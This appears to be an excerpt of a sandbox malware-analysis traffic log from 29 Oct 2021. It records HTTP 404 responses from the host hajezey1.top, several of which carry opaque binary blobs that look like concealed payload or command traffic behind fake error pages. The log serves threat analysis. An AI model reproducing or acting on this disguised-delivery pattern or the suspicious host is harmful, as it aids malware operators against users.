Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 